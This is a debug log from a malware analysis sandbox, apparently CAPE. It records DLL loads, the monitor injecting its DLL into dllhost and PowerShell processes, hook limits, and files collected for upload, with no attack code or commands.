2026-05-28 19:26:23,796 [root] DEBUG: 11316: DLL loaded at 0x00007FFE73E80000: C:\Windows\System32\CFGMGR32 (0x4e000 bytes).
2026-05-28 19:26:23,817 [root] DEBUG: 11316: api-rate-cap: NtWaitForSingleObject hook disabled due to rate
2026-05-28 19:26:23,817 [root] DEBUG: 11316: api-rate-cap: NtReleaseMutant hook disabled due to rate
2026-05-28 19:26:24,022 [root] DEBUG: 11316: DLL loaded at 0x00007FFE764D0000: C:\Windows\System32\coml2 (0x79000 bytes).
2026-05-28 19:26:24,095 [root] DEBUG: 11316: DLL loaded at 0x00007FFE73CE0000: C:\Windows\system32\profapi (0x25000 bytes).
2026-05-28 19:26:24,386 [root] DEBUG: 11316: DLL loaded at 0x00007FFE67520000: C:\Windows\System32\StateRepository.Core (0xb1000 bytes).
2026-05-28 19:26:24,388 [root] DEBUG: 11316: DLL loaded at 0x00007FFE675E0000: C:\Windows\System32\Windows.StateRepository (0x58e000 bytes).
2026-05-28 19:26:24,388 [root] DEBUG: 11316: DLL loaded at 0x00007FFE5F710000: C:\Windows\System32\TileDataRepository (0x99000 bytes).
2026-05-28 19:26:24,390 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6FA60000: C:\Windows\SYSTEM32\wtsapi32 (0x14000 bytes).
2026-05-28 19:26:24,397 [root] DEBUG: 11316: DLL loaded at 0x00007FFE696D0000: C:\Windows\System32\Windows.StateRepositoryPS (0x146000 bytes).
2026-05-28 19:26:24,417 [root] DEBUG: 11316: DLL loaded at 0x00007FFE69820000: C:\Windows\System32\MrmCoreR (0xf4000 bytes).
2026-05-28 19:26:24,426 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6C5B0000: C:\Windows\SYSTEM32\AppxDeploymentClient (0x102000 bytes).
2026-05-28 19:26:24,433 [root] DEBUG: 11316: DLL loaded at 0x00007FFE69600000: C:\Windows\System32\bcp47mrm (0x2d000 bytes).
2026-05-28 19:26:24,466 [root] DEBUG: 11316: DLL loaded at 0x00007FFE69C90000: C:\Windows\System32\iertutil (0x2bc000 bytes).
2026-05-28 19:26:24,467 [root] DEBUG: 11316: DLL loaded at 0x00007FFE600F0000: C:\Windows\System32\NETAPI32 (0x19000 bytes).
2026-05-28 19:26:24,468 [root] DEBUG: 11316: DLL loaded at 0x00007FFE5D810000: C:\Windows\System32\VERSION (0xa000 bytes).
2026-05-28 19:26:24,472 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6ED00000: C:\Windows\System32\WINHTTP (0x10a000 bytes).
2026-05-28 19:26:24,473 [root] DEBUG: 11316: DLL loaded at 0x00007FFE73280000: C:\Windows\System32\NETUTILS (0xc000 bytes).
2026-05-28 19:26:24,473 [root] DEBUG: 11316: DLL loaded at 0x00007FFE72ED0000: C:\Windows\System32\WKSCLI (0x19000 bytes).
2026-05-28 19:26:24,474 [root] DEBUG: 11316: DLL loaded at 0x00007FFE5D820000: C:\Windows\System32\ieframe (0x76c000 bytes).
2026-05-28 19:26:24,479 [root] DEBUG: 11316: DLL loaded at 0x00007FFE60710000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.3636_none_60b6a03d71f818d5\comctl32 (0x29a000 bytes).
2026-05-28 19:26:24,484 [root] DEBUG: 11316: DLL loaded at 0x00007FFE64CF0000: C:\Windows\System32\Secur32 (0xc000 bytes).
2026-05-28 19:26:24,485 [root] DEBUG: 11316: DLL loaded at 0x00007FFE71590000: C:\Windows\System32\MLANG (0x42000 bytes).
2026-05-28 19:26:24,855 [root] DEBUG: 11316: api-cap: RegQueryValueExW hook disabled due to count: 5000
2026-05-28 19:26:25,174 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 12228: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:25,180 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 12228
2026-05-28 19:26:25,184 [lib.api.process] INFO: Monitor config for process 12228: C:\c6kogbu7\dll\12228.ini
2026-05-28 19:26:25,187 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,189 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,216 [root] DEBUG: Loader: Injecting process 12228 (thread 12232) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,218 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,221 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,227 [lib.api.process] INFO: Injected into 64-bit <Process 12228 dllhost.exe>
2026-05-28 19:26:25,229 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 12228
2026-05-28 19:26:25,231 [lib.api.process] INFO: Monitor config for process 12228: C:\c6kogbu7\dll\12228.ini
2026-05-28 19:26:25,232 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,235 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,242 [root] DEBUG: Loader: Injecting process 12228 (thread 12232) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,243 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,243 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,246 [lib.api.process] INFO: Injected into 64-bit <Process 12228 dllhost.exe>
2026-05-28 19:26:25,250 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11404: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:25,251 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11404
2026-05-28 19:26:25,251 [lib.api.process] INFO: Monitor config for process 11404: C:\c6kogbu7\dll\11404.ini
2026-05-28 19:26:25,252 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,254 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,264 [root] DEBUG: Loader: Injecting process 11404 (thread 11400) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,265 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,266 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,267 [lib.api.process] INFO: Injected into 64-bit <Process 11404 dllhost.exe>
2026-05-28 19:26:25,269 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11404
2026-05-28 19:26:25,269 [lib.api.process] INFO: Monitor config for process 11404: C:\c6kogbu7\dll\11404.ini
2026-05-28 19:26:25,270 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,272 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,279 [root] DEBUG: Loader: Injecting process 11404 (thread 11400) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,281 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,283 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,286 [lib.api.process] INFO: Injected into 64-bit <Process 11404 dllhost.exe>
2026-05-28 19:26:25,291 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11572: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:25,292 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11572
2026-05-28 19:26:25,296 [lib.api.process] INFO: Monitor config for process 11572: C:\c6kogbu7\dll\11572.ini
2026-05-28 19:26:25,297 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,301 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,308 [root] DEBUG: Loader: Injecting process 11572 (thread 11568) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,310 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,311 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,313 [lib.api.process] INFO: Injected into 64-bit <Process 11572 dllhost.exe>
2026-05-28 19:26:25,314 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11572
2026-05-28 19:26:25,315 [lib.api.process] INFO: Monitor config for process 11572: C:\c6kogbu7\dll\11572.ini
2026-05-28 19:26:25,315 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,320 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,326 [root] DEBUG: Loader: Injecting process 11572 (thread 11568) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,327 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,327 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,329 [lib.api.process] INFO: Injected into 64-bit <Process 11572 dllhost.exe>
2026-05-28 19:26:25,334 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11712: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:25,337 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11712
2026-05-28 19:26:25,337 [lib.api.process] INFO: Monitor config for process 11712: C:\c6kogbu7\dll\11712.ini
2026-05-28 19:26:25,339 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,340 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,346 [lib.api.process] INFO: Injected into 64-bit <Process 11712 dllhost.exe>
2026-05-28 19:26:25,347 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11712
2026-05-28 19:26:25,350 [lib.api.process] INFO: Monitor config for process 11712: C:\c6kogbu7\dll\11712.ini
2026-05-28 19:26:25,351 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,355 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,360 [root] DEBUG: Loader: Injecting process 11712 (thread 11708) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,364 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,366 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,368 [lib.api.process] INFO: Injected into 64-bit <Process 11712 dllhost.exe>
2026-05-28 19:26:25,464 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 12184: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:25,466 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 12184
2026-05-28 19:26:25,466 [lib.api.process] INFO: Monitor config for process 12184: C:\c6kogbu7\dll\12184.ini
2026-05-28 19:26:25,467 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,469 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,477 [root] DEBUG: Loader: Injecting process 12184 (thread 12180) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,478 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,478 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,480 [lib.api.process] INFO: Injected into 64-bit <Process 12184 dllhost.exe>
2026-05-28 19:26:25,481 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 12184
2026-05-28 19:26:25,481 [lib.api.process] INFO: Monitor config for process 12184: C:\c6kogbu7\dll\12184.ini
2026-05-28 19:26:25,482 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,486 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,491 [root] DEBUG: Loader: Injecting process 12184 (thread 12180) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,492 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,493 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,495 [lib.api.process] INFO: Injected into 64-bit <Process 12184 dllhost.exe>
2026-05-28 19:26:25,500 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11484: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:25,501 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11484
2026-05-28 19:26:25,502 [lib.api.process] INFO: Monitor config for process 11484: C:\c6kogbu7\dll\11484.ini
2026-05-28 19:26:25,505 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,507 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,511 [root] DEBUG: Loader: Injecting process 11484 (thread 11428) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,512 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,512 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,513 [lib.api.process] INFO: Injected into 64-bit <Process 11484 dllhost.exe>
2026-05-28 19:26:25,514 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11484
2026-05-28 19:26:25,515 [lib.api.process] INFO: Monitor config for process 11484: C:\c6kogbu7\dll\11484.ini
2026-05-28 19:26:25,515 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:25,518 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:25,523 [root] DEBUG: Loader: Injecting process 11484 (thread 11428) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,525 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:25,525 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:25,526 [lib.api.process] INFO: Injected into 64-bit <Process 11484 dllhost.exe>
2026-05-28 19:26:25,817 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6E390000: C:\Windows\system32\windowscodecs (0x1b4000 bytes).
2026-05-28 19:26:25,822 [root] DEBUG: 11316: DLL loaded at 0x00007FFE69C60000: C:\Windows\System32\srvcli (0x28000 bytes).
2026-05-28 19:26:25,824 [root] DEBUG: 11316: DLL loaded at 0x00007FFE69F50000: C:\Windows\System32\urlmon (0x1ed000 bytes).
2026-05-28 19:26:25,848 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6CDC0000: C:\Windows\System32\OneCoreUAPCommonProxyStub (0x7d0000 bytes).
2026-05-28 19:26:26,570 [root] DEBUG: 4712: api-cap: RegOpenKeyExW hook disabled due to count: 5000
2026-05-28 19:26:26,570 [root] DEBUG: 4712: api-cap: RegOpenKeyExW hook disabled due to count: 5001
2026-05-28 19:26:26,643 [root] DEBUG: 4712: api-cap: CoCreateInstance hook disabled due to count: 5000
2026-05-28 19:26:26,644 [root] DEBUG: 4712: api-cap: CoCreateInstance hook disabled due to count: 5001
2026-05-28 19:26:26,644 [root] DEBUG: 4712: api-cap: CoCreateInstance hook disabled due to count: 5002
2026-05-28 19:26:27,383 [root] DEBUG: 4712: DLL loaded at 0x00007FFE67E00000: C:\Windows\system32\twext (0x33000 bytes).
2026-05-28 19:26:27,384 [root] DEBUG: 4712: DLL loaded at 0x00007FFE67E00000: C:\Windows\system32\twext (0x33000 bytes).
2026-05-28 19:26:27,408 [root] DEBUG: 4712: api-rate-cap: NtQueryKey hook disabled due to rate
2026-05-28 19:26:27,442 [root] DEBUG: 4712: DLL loaded at 0x0000000009810000: C:\Windows\System32\WorkfoldersShell (0x3d000 bytes).
2026-05-28 19:26:27,443 [root] DEBUG: 4712: DLL loaded at 0x0000000009810000: C:\Windows\System32\WorkfoldersShell (0x3d000 bytes).
2026-05-28 19:26:27,458 [root] DEBUG: 4712: DLL loaded at 0x00007FFE61100000: C:\Program Files\Windows Defender\shellext (0x55000 bytes).
2026-05-28 19:26:27,459 [root] DEBUG: 4712: DLL loaded at 0x00007FFE61100000: C:\Program Files\Windows Defender\shellext (0x55000 bytes).
2026-05-28 19:26:27,472 [root] DEBUG: 4712: DLL loaded at 0x0000000009740000: C:\Windows\system32\sfc (0x3000 bytes).
2026-05-28 19:26:27,473 [root] DEBUG: 4712: DLL loaded at 0x0000000009740000: C:\Windows\system32\sfc (0x3000 bytes).
2026-05-28 19:26:27,475 [root] DEBUG: 4712: DLL loaded at 0x00007FFE38EC0000: C:\Windows\system32\msi (0x337000 bytes).
2026-05-28 19:26:27,475 [root] DEBUG: 4712: DLL loaded at 0x00007FFE38EC0000: C:\Windows\system32\msi (0x337000 bytes).
2026-05-28 19:26:27,476 [root] DEBUG: 4712: DLL loaded at 0x00007FFE62410000: C:\Windows\system32\sfc_os (0x12000 bytes).
2026-05-28 19:26:27,477 [root] DEBUG: 4712: DLL loaded at 0x00007FFE62410000: C:\Windows\system32\sfc_os (0x12000 bytes).
2026-05-28 19:26:27,477 [root] DEBUG: 4712: DLL loaded at 0x00007FFE5C360000: C:\Windows\system32\acppage (0x19000 bytes).
2026-05-28 19:26:27,478 [root] DEBUG: 4712: DLL loaded at 0x00007FFE5C360000: C:\Windows\system32\acppage (0x19000 bytes).
2026-05-28 19:26:27,561 [root] DEBUG: 4712: CreateProcessHandler: Injection info set for new process 12824: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ImageBase: 0x00007FF7D7D40000
2026-05-28 19:26:27,562 [root] INFO: Announced 64-bit process name: powershell.exe pid: 12824
2026-05-28 19:26:27,563 [lib.api.process] INFO: Monitor config for process 12824: C:\c6kogbu7\dll\12824.ini
2026-05-28 19:26:27,564 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:28,049 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:28,055 [root] DEBUG: Loader: Injecting process 12824 (thread 12828) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:28,056 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:28,057 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:28,058 [lib.api.process] INFO: Injected into 64-bit <Process 12824 powershell.exe>
2026-05-28 19:26:28,060 [root] INFO: Announced 64-bit process name: powershell.exe pid: 12824
2026-05-28 19:26:28,060 [lib.api.process] INFO: Monitor config for process 12824: C:\c6kogbu7\dll\12824.ini
2026-05-28 19:26:28,061 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:28,657 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:28,661 [root] DEBUG: Loader: Injecting process 12824 (thread 12828) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:28,661 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2026-05-28 19:26:28,662 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:28,663 [lib.api.process] INFO: Injected into 64-bit <Process 12824 powershell.exe>
2026-05-28 19:26:28,665 [root] DEBUG: 4712: DLL loaded at 0x00007FFE62B90000: C:\Windows\SYSTEM32\pcacli (0x16000 bytes).
2026-05-28 19:26:28,665 [root] DEBUG: 4712: DLL loaded at 0x00007FFE62B90000: C:\Windows\SYSTEM32\pcacli (0x16000 bytes).
2026-05-28 19:26:28,667 [root] INFO: Announced 64-bit process name: powershell.exe pid: 12824
2026-05-28 19:26:28,668 [lib.api.process] INFO: Monitor config for process 12824: C:\c6kogbu7\dll\12824.ini
2026-05-28 19:26:28,668 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:29,310 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:29,314 [root] DEBUG: Loader: Injecting process 12824 with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:29,315 [root] DEBUG: InjectDll: No thread ID supplied, initial thread ID 12828, handle 0x120
2026-05-28 19:26:29,316 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2026-05-28 19:26:29,317 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:29,318 [lib.api.process] INFO: Injected into 64-bit <Process 12824 powershell.exe>
2026-05-28 19:26:29,343 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 12976, handle 0xe80: C:\Windows\System32\conhost.exe
2026-05-28 19:26:29,349 [root] DEBUG: 4712: OpenProcessHandler: Image base for process 12976 (handle 0xf88): 0x00007FF7D03C0000.
2026-05-28 19:26:29,365 [root] DEBUG: 4712: api-cap: RegQueryValueExW hook disabled due to count: 5000
2026-05-28 19:26:29,390 [root] DEBUG: 12824: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:29,391 [root] DEBUG: 12824: Interactive desktop enabled.
2026-05-28 19:26:29,391 [root] DEBUG: 12824: Dropped file limit defaulting to 100.
2026-05-28 19:26:29,396 [root] DEBUG: 12824: Disabling sleep skipping.
2026-05-28 19:26:29,398 [root] DEBUG: 12824: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:26:29,410 [root] DEBUG: 12824: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:26:29,410 [root] DEBUG: 12824: YaraScan: Scanning 0x00007FF7D7D40000, size 0x7caba
2026-05-28 19:26:29,415 [root] DEBUG: 12824: Monitor initialised: 64-bit capemon loaded in process 12824 at 0x00007FFE34DD0000, thread 12828, image base 0x00007FF7D7D40000, stack from 0x000000A12DDC4000-0x000000A12DDD0000
2026-05-28 19:26:29,416 [root] DEBUG: 12824: Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
2026-05-28 19:26:29,427 [root] DEBUG: 12824: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:26:29,453 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:26:29,454 [root] DEBUG: 12824: set_hooks: Unable to hook LockResource
2026-05-28 19:26:29,459 [root] DEBUG: 12824: Hooked 627 out of 628 functions
2026-05-28 19:26:29,462 [root] DEBUG: 12824: Syscall hook installed, syscall logging level 1
2026-05-28 19:26:29,468 [root] DEBUG: 12824: RestoreHeaders: Restored original import table.
2026-05-28 19:26:29,469 [root] INFO: Loaded monitor into process with pid 12824
2026-05-28 19:26:29,472 [root] DEBUG: 12824: caller_dispatch: Added region at 0x00007FF7D7D40000 to tracked regions list (kernel32::SetUnhandledExceptionFilter returns to 0x00007FF7D7D44D21, thread 12828).
2026-05-28 19:26:29,474 [root] DEBUG: 12824: YaraScan: Scanning 0x00007FF7D7D40000, size 0x7caba
2026-05-28 19:26:29,477 [root] DEBUG: 12824: ProcessImageBase: Main module image at 0x00007FF7D7D40000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:26:29,481 [root] DEBUG: 12824: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:26:29,482 [root] DEBUG: 12824: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptPrimitives (0x82000 bytes).
2026-05-28 19:26:29,484 [root] DEBUG: 12824: DLL loaded at 0x00007FFE71770000: C:\Windows\system32\uxtheme (0x9e000 bytes).
2026-05-28 19:26:29,486 [root] DEBUG: 12824: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:26:29,488 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73720000: C:\Windows\system32\Wldp (0x2d000 bytes).
2026-05-28 19:26:29,489 [root] DEBUG: 12824: DLL loaded at 0x00007FFE71E90000: C:\Windows\system32\windows.storage (0x79b000 bytes).
2026-05-28 19:26:29,494 [root] DEBUG: 12824: DLL loaded at 0x00007FFE69670000: C:\Windows\System32\Bcp47Langs (0x5b000 bytes).
2026-05-28 19:26:29,497 [root] DEBUG: 12824: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\SHCORE (0xad000 bytes).
2026-05-28 19:26:29,498 [root] DEBUG: 12824: DLL loaded at 0x00007FFE728C0000: C:\Windows\System32\sppc (0x25000 bytes).
2026-05-28 19:26:29,498 [root] DEBUG: 12824: DLL loaded at 0x00007FFE728F0000: C:\Windows\System32\SLC (0x29000 bytes).
2026-05-28 19:26:29,499 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73CA0000: C:\Windows\System32\USERENV (0x2e000 bytes).
2026-05-28 19:26:29,500 [root] DEBUG: 12824: DLL loaded at 0x00007FFE60060000: C:\Windows\System32\appresolver (0x90000 bytes).
2026-05-28 19:26:29,521 [root] DEBUG: 12824: DLL loaded at 0x00007FFE6F930000: C:\Windows\system32\PROPSYS (0xf6000 bytes).
2026-05-28 19:26:29,534 [root] DEBUG: 12824: DLL loaded at 0x00007FFE604C0000: C:\Windows\SYSTEM32\LINKINFO (0xd000 bytes).
2026-05-28 19:26:29,542 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73E80000: C:\Windows\System32\CFGMGR32 (0x4e000 bytes).
2026-05-28 19:26:29,576 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73CE0000: C:\Windows\system32\profapi (0x25000 bytes).
2026-05-28 19:26:29,616 [root] INFO: Added new file to list with pid 12824 and path C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk
2026-05-28 19:26:29,707 [root] DEBUG: 12824: api-rate-cap: RegQueryValueExW hook disabled due to rate
2026-05-28 19:26:29,737 [root] DEBUG: 12824: api-rate-cap: NtQueryValueKey hook disabled due to rate
2026-05-28 19:26:29,781 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5E1B0000: C:\Windows\SYSTEM32\ntshrui (0x7d000 bytes).
2026-05-28 19:26:29,788 [root] DEBUG: 12824: DLL loaded at 0x00007FFE69C60000: C:\Windows\SYSTEM32\srvcli (0x28000 bytes).
2026-05-28 19:26:29,790 [root] DEBUG: 12824: DLL loaded at 0x00007FFE609B0000: C:\Windows\SYSTEM32\cscapi (0x12000 bytes).
2026-05-28 19:26:29,809 [root] DEBUG: 12824: DLL loaded at 0x00007FFE72E40000: C:\Windows\system32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:29,810 [root] DEBUG: 12824: DLL loaded at 0x00007FFE6E1D0000: C:\Windows\SYSTEM32\policymanager (0xa1000 bytes).
2026-05-28 19:26:29,832 [root] INFO: Added new file to list with pid 12824 and path C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RYBA3C0OVGR1Y5GNDC56.temp
2026-05-28 19:26:29,837 [root] DEBUG: 12824: DLL loaded at 0x00007FFE72EF0000: C:\Windows\SYSTEM32\ntmarta (0x33000 bytes).
2026-05-28 19:26:29,838 [root] INFO: Added new file to list with pid 12824 and path C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
2026-05-28 19:26:29,847 [lib.common.results] INFO: Uploading file C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF15464.TMP to files\05b3425ceb15e3e6b32abc65c75544d4f6bc7d63f10eb5dd08037aea6e51c437; Size is 5441; Max size: 100000000
2026-05-28 19:26:29,852 [root] DEBUG: 12824: DLL loaded at 0x00007FFE70740000: C:\Windows\SYSTEM32\wintypes (0x155000 bytes).
